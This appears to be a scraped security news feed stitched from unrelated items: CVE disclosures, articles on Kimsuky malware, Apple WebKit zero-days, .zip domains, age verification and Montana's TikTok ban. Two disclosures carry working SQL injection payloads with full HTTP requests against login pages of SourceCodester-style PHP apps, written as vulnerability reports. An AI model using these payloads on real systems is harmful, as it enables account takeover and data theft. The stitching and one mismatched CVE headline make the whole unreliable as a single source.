Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges.

CVE-2023-31747: A new much less corrupt form of democracy

SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.

**BUG\_Author:**

**ZongXin Li**

**Affected version:**

EMPLOYEE AND VISITOR GATE PASS LOGGING SYSTEM - 1.0

**Vendor:**

https://www.sourcecodester.com/users/tips23

**Software:**

https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html

**Vulnerability File:**

/employee\_gatepass/classes/Login.php

**Description:**

The system Employee and Visitor Gate Pass Logging 1.0 is vulnerable to SQL Injection via /employee\_gatepass/classes/Login.php. The parameter username is not sanitized correctly. The malicious actor can use this vulnerability to manipulate the administrator account of the systemand can take full control of the information about the other accounts. Status: CRITICAL

GET parameter 'username' exists SQL injection vulnerability

Payload1:username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123
    

The server's response time is 10 seconds

Payload2:username=admin'and left(version(),6)='5.7.27' AND 'ledo'='ledo&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin'and left(version(),6)='5.7.26' AND 'ledo'='ledo&password=admin123
    

Error injection success

When I enter the version number 5.7.26, it returns "success". Error statement when typing 5.7.27

CVE-2023-31752: bug_report/SQLi-2.md at main · 4O4NtFd/bug_report

The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation.
"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom

The North Korean advanced persistent threat (APT) group known as **Kimsuky** has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation.

"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report published today.

The ongoing targeted campaign, per the cybersecurity firm, is primarily geared towards information services as well as organizations supporting human rights activists and North Korean defectors.

Kimsuky, active since 2012, has a track record of striking organizations and individuals who are of strategic interest to North Korea.

The intelligence collection missions have recently involved the use of another reconnaissance tool called ReconShark, as detailed by SentinelOne earlier this month.

The latest activity cluster associated with the group commenced on May 5, 2023, and leverages a variant of RandomQuery that's specifically designed to enumerate files and siphon sensitive data.

RandomQuery, alongside FlowerPower and AppleSeed, are among the most frequently distributed tools in Kimsuky's arsenal, with the former functioning as an information stealer and a conduit for distributing remote access trojans like TutRAT and xRAT.

The attacks begin with phishing emails that purport to be from Daily NK, a prominent Seoul-based online publication that covers North Korean affairs, to entice potential targets into opening a Microsoft Compiled HTML Help (CHM) file.

It's worth noting at this stage that CHM files have also been adopted as a lure by a different North Korean nation-state actor referred to as ScarCruft.

Launching the CHM file leads to the execution of a Visual Basic Script that issues a HTTP GET request to a remote server to retrieve the second-stage payload, a VBScript flavor of RandomQuery.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The malware then proceeds to harvest system metadata, running processes, installed applications, and files from different folders, all of which are transmitted back to the command-and-control (C2) server.

"This campaign also demonstrates the group's consistent approach of delivering malware through CHM files," the researchers said.

"These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats."

The findings arrive days after the AhnLab Security Emergency response Center (ASEC) uncovered a watering hole attack mounted by Kimsuky that entails setting up a lookalike webmail system used by national policy research institutes to harvest credentials entered by victims.

In a related development, Kimsuky has also been linked to attacks that weaponize vulnerable Windows Internet Information Services (IIS) servers to drop the Metasploit Meterpreter post-exploitation framework, which is then used to deploy a Go-based proxy malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it.

POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID\=n8igimmg4o7ddmpnbfueujouvg
Content\-Length: 62
Cache\-Control: max\-age\=0
Sec\-Ch\-Ua: "Not:A-Brand";v\="99", "Chromium";v\="112"
Sec\-Ch\-Ua\-Mobile: ?0
Sec\-Ch\-Ua\-Platform: "Windows"
Upgrade\-Insecure\-Requests: 1
Origin: https://pwnedhost.com
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">

<head>
  
  <title>Old Age Home Management System|| Dashboard</title>
  
  <link rel="stylesheet" href="vendors/typicons/typicons.css">
  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
  <link rel="stylesheet" href="css/vertical-layout-light/style.css">
  
  
</head>

CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  RSR

Tags:  CVE-2023-32409

Tags:  CVE-2023-28204

Tags:  CVE-2023-32373

Tags:  out of bounds

Tags:  use after free

Apple issued information about patches against three actively exploited zero-days in WebKit. One vulnerability is new, two were patched earlier this month.



(Read more...)




The post Update now! Apple issues patches for three actively used zero-days appeared first on Malwarebytes Labs.

Apple has rolled out security updates for Safari 16.5, watchOS 9.5, tvOS 16.5, iOS 16.5, iPadOS 16.5, iOS 15.7.6, iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6.

Among the security updates were patches for three actively exploited zero-day vulnerabilities. All these actively exploited vulnerabilities are directly related to the WebKit browser engine.

WebKit is the engine that powers the Safari web browser on Macs as well as all browsers on iOS and iPadOS (all web browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

Devices impacted by the identified exploits include:

*   All iPad Pro models
*   iPad Air (3rd generation and later)
*   iPad (5th generation and later)
*   iPad Mini (5th generation and later)
*   iPhone 6s and later models
*   Mac workstations and laptops running macOS, Big Sur, Monterey, and Ventura
*   Apple Watch (series 4 and later)
*   Apple TV 4K and HD

The updates may already have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS:

*   How to update your iPhone or iPad.
*   How to update macOS on Mac.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE containing the information about the new zero-day is:

*   CVE-2023-32409: An issue where remote attacker may be able to break out of Web Content sandbox was addressed with improved bounds checks.

The notes about the security updates also revealed some information about the Apple’s Rapid Security Response (RSR) update we reported about earlier this month.

RSR is a new type of software patch delivered between Apple's regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They're meant to make the deployment of security improvements faster and more frequent.

We now know that the CVEs patched in that RSR update are listed as:

*   CVE-2023-28204: An out-of-bounds read issue in WebKit was addressed with improved input validation. Processing web content may disclose sensitive information.
*   CVE-2023-32373: A use-after-free issue in WebKit which was addressed with improved memory management. Processing maliciously crafted web content may lead to arbitrary code execution.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Apple issues patches for three actively used zero-days

Categories: Podcast
This week on Lock and Code, we speak with longtime security researcher about the eerily similar attempts across the globe to weaken the Internet to achieve one specific, social goal. 



(Read more...)




The post Identity crisis: How an anti-porn crusade could jam the Internet, featuring Alec Muffett: Lock and Code S04E11 appeared first on Malwarebytes Labs.

On January 1, 2023, the Internet in Louisiana looked a little different than the Internet in Texas, Mississippi, and Arkansas—its next-door state neighbors. And on May 1, the Internet in Utah looked quite different, depending on where you looked, than the Internet in Arizona, or Idaho, or Nevada, or California or Oregon or Washington or, really, much of the rest of the United States. 

The changes are, ostensibly, over pornography. 

In Louisiana, today, visitors to the online porn site PornHub are asked to verify their age before they can access the site, and that age verification process hinges on a state-approved digital ID app called LA Wallet. In the United Kingdom, sweeping changes to the Internet are being proposed that would similarly require porn sites to verify the ages of their users to keep kids from seeing sexually explicit material. And in Australia, similar efforts to require age verification for adult websites might come hand-in-hand with the deployment of a government-issued digital ID. 

But the large problem with all these proposals is not that they would make a new Internet only for children, but a new Internet for everyone.

Look no further than Utah. 

On May 1, after new rules came into effect to make porn sites verify the ages of their users, the site PornHub decided to refuse to comply with the law and instead, to block access to the site for anyone visiting from an IP address based in Utah. If you’re in Utah, right now, and connecting to the Internet with an IP address located in Utah, you cannot access PornHub. Instead, you’re presented with a message from adult film star Cheri Deville who explains that:

“As you may know, your elected officials have required us to verify your age before granting you access to our website. While safety and compliance are at the forefront of our mission, giving your ID card every time you want to visit an adult platform is not the most effective solution for protecting our users, and in fact, will put children and your privacy at risk.”

Today, on the Lock and Code podcast with host David Ruiz, we speak with longtime security researcher Alec Muffett (who has joined us before to talk about Tor) to understand what is behind these requests to change the Internet, what flaws he's seen in studying past age verification proposals, and whether many members of the public are worrying about the wrong thing in trying to solve a social issue with technology. 

"The battle cry of these people have has always been—either directly or mocked as being—'Could somebody think of the children?' And I'm thinking about the children because I want my daughter to grow up with an untracked, secure private internet when she's an adult. I want her to be able to have a private conversation. I want her to be able to browse sites without giving over any information or linking it to her identity."

Muffett continued:

> "I'm trying to protect that for her. I'd like to see more people grasping for that."

Tune in today.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Malwarebytes Privacy VPN can encrypt your connection when using public WiFi, and it can block companies and websites from seeing your IP address and location to identify who you are, where you live, or what you’re doing on the Internet.

TRY NOW

"A Sequence of Spankingly Bad Ideas." - An analysis of age verification technology presentations from 2016. Alec Muffett.

"Adults might have to buy £10 ‘porn passes’ from newsagents to prove their age online." - The United Kingdom proposes an "adult pass" for purchase in 2018 to comply with earlier efforts for online age verification. Metro. 

"Age verification won't block porn. But it will spell the end of ethical porn." - An independent porn producer explains how compliance costs for age verification could shut down small outfits that make, film, and sell ethical pornography. The Guardian. 

"Minnesota’s Attempt to Copy California’s Constitutionally Defective Age Appropriate Design Code is an Utter Fail." - Age verification creeps into US proposals. Technology and Marketing Law Blog, run by Eric Goldman. 

"Nationwide push to require social media age verification raises questions about privacy, industry standards." - Cyberscoop.

"The Fundamental Problems with Social Media Age Verification Legislation." - R Street Institute.

YouTube's age verification in action. - Various methods and requirements shown in Google's Support center for ID verification across the globe. 

"When You Try to Watch Pornhub in Utah, You See Me Instead. Here’s Why." - Cheri Deville's call for specialized phones for minors. Rolling Stone.

Identity crisis: How an anti-porn crusade could jam the Internet, featuring Alec Muffett: Lock and Code S04E11

While the company’s new top-level domains could be used in phishing attacks, security researchers are divided on how big of a problem they really pose.

At the beginning of May, Google released eight new top-level domains (TLDs)—the suffixes at the end of URLs, like “.com” or “.uk.” These little addendums were developed decades ago to expand and organize URLs, and over the years, the nonprofit Internet Corporation for Assigned Names and Numbers (ICANN) has loosened restrictions on TLDs so organizations like Google can bid to sell access to more of them. But while Google's announcement included light-hearted offerings like “.dad” and “.nexus,” it also debuted a pair of TLDs that are uniquely poised to invite phishing and other types of online scamming: “.zip” and “.mov”.

The two stand out because they are also common file extension names. The former, .zip, is ubiquitous for data compression, while .mov is a video format developed by Apple. The concern, which is already starting to play out, is that URLs that look like file names will open up even more possibilities for digital scams like phishing that trick web users into clicking on malicious links that are masquerading as something legitimate. And the two domains could also expand the problem of programs mistakenly recognizing file names as URLs and automatically adding links to the file names. With this in mind, scammers could strategically buy .zip and .mov URLs that are also common file names—think, springbreak23.mov—so online references to a file with that name could automatically link to a malicious website.

“Attackers will use whatever they can to get inside an organization,” says Ronnie Tokazowski, a longtime phishing researcher and principal threat adviser at the cybersecurity firm Cofense. “Man, this all goes back a long time now. Nothing has changed.”

Researchers have already started seeing malicious actors buying up strategic .zip URLs and begin testing them in phishing campaigns. But reactions are mixed on how much of a negative impact .zip and .mov domains will have when scams that prey on URL confusion are already an inveterate threat. Additionally, proxies and other traffic management tools already deploy anti-phishing protections to cut down on the risks if users mis-click—and .zip and .mov will simply be incorporated into those defenses.

“The risk of confusion between domain names and file names is not a new one. For example, 3M’s Command products use the domain name command.com, which is also an important program on MS DOS and early versions of Windows,” Google told WIRED in a statement. “Applications have mitigations for this (such as Google Safe Browsing), and these mitigations will hold true for TLD’s such as .zip.” The company added that Google Registry already includes mechanisms to suspend or remove malicious domains across all of the company's top-level domains. “We will continue to monitor the usage of .zip and other TLDs, and if new threats emerge we will take appropriate action to protect users,” the company said.

Offering more TLDs broadens the number of URLs that are available to people. This means you have more choices and don't necessarily have to pay a premium to buy the site name you want from an existing owner or speculator who bought up a bunch of historic URLs. And some in the security community feel that, given the already extensive risk of phishing attacks, additions like .zip and .mov add negligible additional danger.

“I don't agree with the assertion that the new TLDs will increase the effectiveness of phishing in any meaningful way—primarily because people are already so easily fooled by URLs,” says security researcher Troy Hunt, who runs the breach-tracking service HaveIBeenPwned. “Not only can we, myself included, not tell the difference between so many ambiguous characters, we also usually have no idea what the correct URL is for many services. I bet you this all blows over before you know it with no incidents of consequence.”

Some researchers feel strongly, though, that a company like Google, which invests so much in anti-scam and anti-phishing work, could have simply opted not to offer these particular TLDs. Even if other top-level domains exist that are also file extensions, they argue that the world doesn't need more of these overlaps.

“Nobody said this was new. In fact, half the issue is that it’s not new,” says security researcher Marcus Hutchins. “We’ve had this issue in the past, and Google has just gone and caused the same problem again. It really seems like they created a big usability and security issue for downstream providers to clean up, all for no reason other than a low-effort money grab.”

The Real Risks in Google’s New .Zip and .Mov Domains

Plus: The FBI gets busted abusing a spy tool, an ex-Apple engineer is charged with corporate espionage, and collection of airborne DNA raises new privacy risks.

OpenAI’s new ChatGPT app for iOS couldn’t have arrived soon enough. Its absence left open a void in Google Play and Apple’s App Store, which have been quietly filling with scam apps that sucker users into paying for weekly or monthly subscriptions, according to research from security firm Sophos. The official ChatGPT app, meanwhile, is free, and an Android version is arriving soon.

But just because something is free doesn’t make it good. Telly TV is offering 55-inch televisions for $0 to the first 500,000 people who join its reservation list. Of course, “free” comes with a catch: The company reserves the right to collect heaps of data about your viewing habits, and the TV includes a built-in camera that can track your movements. Oh, and it has a second screen primarily for bombarding you with ads. But hey, nothing beats free, right?

Elsewhere in the world of tech that has people freaked out, Montana this week became the first state in the US to ban TikTok. The ban, which goes into effect in 2024, is already facing legal challenges on the grounds that it violates TikTok users’ First Amendment rights. Even if the ban remains, getting around it is trivial—just use a VPN.

The families of four people killed in a racism-fueled mass shooting at a grocery store in Buffalo, New York, are suing a slew of companies the plaintiffs say bear some responsibility for the massacre. The companies include Meta, Alphabet, Amazon, Snap, Reddit, and 4chan. Also on the list of defendants is Good Smile, a Japanese toy company that in 2015 purchased a 30 percent stake in 4chan, where the gunman sought advice on how to carry out his attack.

The United States Postal Service doesn’t just deliver mail—it also carries out warrantless mass surveillance. A bipartisan group of US senators this week launched an effort to curb the use of so-called mail covers, which USPS investigators use to gather the information on the outside of letters and packages. The senators say the practice, which does not require a court order, “threatens both our privacy and First Amendment rights.” 

In the UK, the government is working to expand a controversial surveillance program that collects web histories and other “internet connection records” on millions of people. The program began after the 2016 passage of the Investigatory Powers Act, often called the Snooper’s Charter by privacy advocates and other critics. Records show that the program appears to be moving out of its trial phase and may be rolled out nationally. 

Meanwhile, researchers at security firm Kaspersky released new details about a mysterious hacker group that has carried out operations in Ukraine for far longer than people realized. Dubbed Red Stinger by researchers at Malwarebytes, the group has targeted both pro-Ukraine and pro-Russian figures as part of apparent espionage operations. Initially linked to hacks dating back to 2020, researchers now believe Red Stinger has been active for at least 15 years.

But wait, there’s more. Each week we round up the security stories we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Most TikTok challenges you hear about are fake. This one, however, is deadly serious. Automaker Huyandai this week agreed to pay around $200 million to customers whose vehicles were stolen following a viral TikTok challenge that exposed a major security flaw in some Hyundai and Kia vehicles. 

The challenge began after the user “Kia Boys” posted a video to TikTok showing that it was possible to hot-wire the vulnerable vehicles using a USB cable. According to Engadget, at least 14 crashes and eight deaths have been linked to the challenge. Hyundai will pay affected customers up to $6,125 for stolen vehicles and up to $3,375 to cover the cost of damage caused by those who took advantage of the flaw. The company also has an “anti-theft update” available for affected vehicles. Check to see if your vehicle is impacted here.

The US Foreign Intelligence Surveillance Court yesterday unsealed an April 2022 opinion that exposes rampant FBI misuse of the so-called Section 702 database, a vast trove of electronic communication records used by the bureau and the National Security Agency. The court found that the FBI improperly queried the database, established under Section 702 of the Foreign Intelligence Surveillance Act, more than 287,000 times in 2020 and 2021. Targets of the FBI’s searches include January 6 demonstrators, people arrested while protesting the police murder of George Floyd in Minneapolis, and some 19,000 American political donors to an unidentified US congressional campaign. 

Section 702 gives the US government the authority to collect communications of targets overseas. Communications of Americans can get swept into the database when they communicate with someone outside the US. An audit released by the Office of the Director of National Intelligence late last year found several similar instances of the FBI misusing the Section 702 database to perform searches on American citizens, including US congressman Darin LaHood. Following both the ODNI audit and this week’s release of the court’s opinion, the FBI says the abuse was the result of a “misunderstanding” and vowed that it has fixed the problem. Regardless, Section 702 will expire at the end of the year without reauthorization from Congress, which the FBI’s repeated and widespread misuse could jeopardize.

The US Department of Justice on Tuesday announced charges against a former Apple engineer accused of stealing the company’s source code related to its self-driving-car technology. Weibao Wang allegedly stole the “sensitive” documents in the final days of his employment at Apple in April 2018. Wang left Apple five months after he signed an agreement to work for a US-based subsidiary of a company headquartered in China, according to the Justice Department. After US law enforcement searched his Mountain View, California, home in June 2018, 35-year-old Wang fled to China, the Justice Department says. If convicted, Wang faces up to 10 years in prison plus fines.

Everyone knows how much data can be collected about you anytime you’re online. But a bigger concern may be what someone can collect about you anytime you’re anywhere. That’s the warning in a new research paper, which found that it’s possible to collect “environmental DNA”—traces of genetic material floating in the air or liquids, also called eDNA—that can be linked to a person’s medical or ancestral details. Legal experts who spoke to the _The New York Times_ warn that if police or other government authorities begin collecting eDNA, as scientists studying animals have done for a decade, it could create widespread privacy and civil liberties abuses.

A TikTok ‘Car Theft’ Challenge Is Costing Hyundai $200 Million

In an advisory released by the company, Apple revealed patches for three previously unknown bugs it  says may already have been used by attackers.

Three zero-day vulnerabilities — tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373 — were found in Apple's WebKit browser platform and affect iOS, macOS, and iPad products.

These vulnerabilities affect "iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later," Apple said in one of its new advisories.

CVE-2023-32409 is a vulnerability in which a remote attacker is "able to break out of Web Content sandbox," according to Apple. The vendor said CVE-2023-28204 entails processing Web content that may disclose sensitive information, and CVE-2023-32373 warns that processing "maliciously crafted Web content may lead to arbitrary code execution."

Apple said it's aware that the bugs may have already been actively exploited by threat actors but did not elaborate on any of these attacks.

While Apple reported that two of the three vulnerabilities were reported by anonymous researchers after they were first addressed, one of them — CVE-2023-32409 — was reported by Clément Lecigne, a security engineer in Google's Threat Analysis Group, and Donncha Ó Cearbhaill, a security researcher and hacker in Amnesty International's Security Lab.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Apple Patches 3 Zero-Days Possibly Already Exploited

Montana’s TikTok ban will be impossible to enforce. But it could encourage copycat crackdowns against the social media app.

Montana’s TikTok ban is a technological nightmare. Experts warn it will be incredibly difficult for officials to enforce and incredibly easy for almost anyone to get around. But more than that, it’s a move that undermines America’s history of fostering an open, democratic internet.

The law, which comes into effect at the start of 2024, will both block TikTok from mobile app stores in Montana while also banning TikTok from operating in the state. It’s a move that brings with it a host of First Amendment concerns, and may never be enacted if legal challenges block it. But, if it does go ahead, experts warn it is likely to be a mess.

“From a technical perspective, even if this was a national law, there would be challenges to try to make this work,” says John Morris, principal, US internet policy and advocacy at the Internet Society, a nonprofit that promotes an open internet. But because people can use VPNs to change their browsing location, it’s even harder to ensure a local ban will work. “State boundaries are not something that’s built into the internet.” 

The new law is the first on the books following years of anxiety in the US around TikTok as a national security risk. That perceived threat looms because TikTok’s parent company, ByteDance, is Chinese-owned. TikTok has also become one of the most popular apps in the world, with 150 million users in the US alone. 

The Montana law calls for $10,000 penalties to be levied on mobile app stores when they allow people to download or use TikTok. TikTok could also be fined for operating in the state. The fines would not apply to people who download the app. 

The US has historically advocated for an open internet and criticized countries that censor online access. China is successful in its mass censorship because of its Great Firewall—a system unlike anything in the US, and one that Montana could not build for itself. Other countries, including Indonesia and Pakistan, have banned TikTok and then rescinded the blocks. India’s TikTok ban, introduced in June 2020, is still in place. Montana, along with other states, and the US federal government have blocked TikTok from government devices, but geoblocking from specific regions within the US would prove much harder.

An older version of the Montana bill would have forced internet services providers to block TikTok in the state. But ISPs said it would be impossible to do so, and the requirement was removed. Mobile app providers like Apple and Google did not respond to requests for comment. And while Montana has now passed the law banning TikTok, it remains to be seen how it plans to do so.

Montana officials have suggested tech that restricts online sports gambling, which remains illegal in more than a dozen US states, could be employed to boot TikTok out of its borders. If anyone reports a violation, officials would investigate it, and if a breach was verified, cease-and-desist letters would be sent to the companies, the state attorney general’s office told the Associated Press. 

Such blocks are regularly circumvented using VPNs. And VPNs have their own security issues—people who use them can become targets for hackers. Some VPNs also keep logs of user data, which can be accessed by law enforcement with subpoenas. 

But there’s no way for TikTok to know whether people are using VPNs within Montana to access the social network, which makes this law “very complicated,” and “very difficult to enforce” if TikTok is the liable party rather than the service provider, says Kevin Du, a professor of electrical engineering and computer science at Syracuse University. 

In response to the ban, TikTok said it would “continue working to defend the rights” of users inside and outside Montana. The company has also called the ban unlawful. The law was also criticized by the American Civil Liberties Union, which says it violates “free speech rights under the guise of national security and lays the groundwork for excessive government control over the internet.” TikTok creators, who are often semipublic figures, have already sued the state of Montana, claiming the new law violates free speech rights.  

It might make up a tiny slice of TikTok’s global user base, but if Montana’s ban stands, it could influence legislation in other US states. A nationwide ban remains both complex and unlikely.

Tag

#apple